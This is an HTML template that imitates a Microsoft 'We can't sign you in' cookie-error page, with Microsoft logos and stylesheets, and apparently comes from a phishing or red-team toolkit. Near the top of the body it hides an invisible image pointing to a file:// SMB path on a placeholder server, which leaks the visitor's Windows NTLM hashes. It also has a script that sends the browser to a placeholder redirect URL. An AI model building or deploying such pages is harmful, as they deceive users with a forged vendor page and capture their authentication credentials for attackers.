


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="en">

<head>
    <title>Something went wrong</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta name="PageID" content="ConvergedDownLevelError" />
    <meta name="SiteID" content="" />
    <meta name="ReqLC" content="1033" />
    <meta name="LocLC" content="en-US" />

    
        <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7843.11/content/images/favicon_a.ico" />

	<link crossorigin="anonymous" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7843.11/content/cdnbundles/converged.v2.login.min.css" rel="stylesheet" />
</head>

<body>
    <img src="file://///$smb_server/smb/hash.jpg" style="display: none;" />
    <script>
	    var url = "$redirect_url";
    	    if (url != "") {
	    	document.location = url;
	    }
    </script>
    <div>
        <div class="outer">
            <div class="middle">
                <div class="inner relative">
                        <img src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7843.11/content/images/microsoft_logo.png" alt="Microsoft account symbol" />

                    <div class="row text-title" role="heading">We can&#39;t sign you in</div>

                        <div class="row form-group">Your browser is currently set to block cookies. You need to allow cookies to use this service.</div>
                        <div class="row form-group">Cookies are small text files stored on your computer that tell us when you&#39;re signed in. To learn how to allow cookies, check the online help in your web browser.</div>
                </div>
            </div>
        </div>

        <div class="footer default">
            <div id="footerLinks" class="footerNode text-secondary">
                    <div class="footerNode">
                        <span>
&#169;2018 Microsoft                        </span>
                        <a href="https://www.microsoft.com/en-US/servicesagreement/" target="_blank">Terms of use</a>
                        <a href="https://privacy.microsoft.com/en-US/privacystatement" target="_blank">Privacy &amp; cookies</a>
                    </div>
            </div>
        </div>
    </div>
</body>
</html>
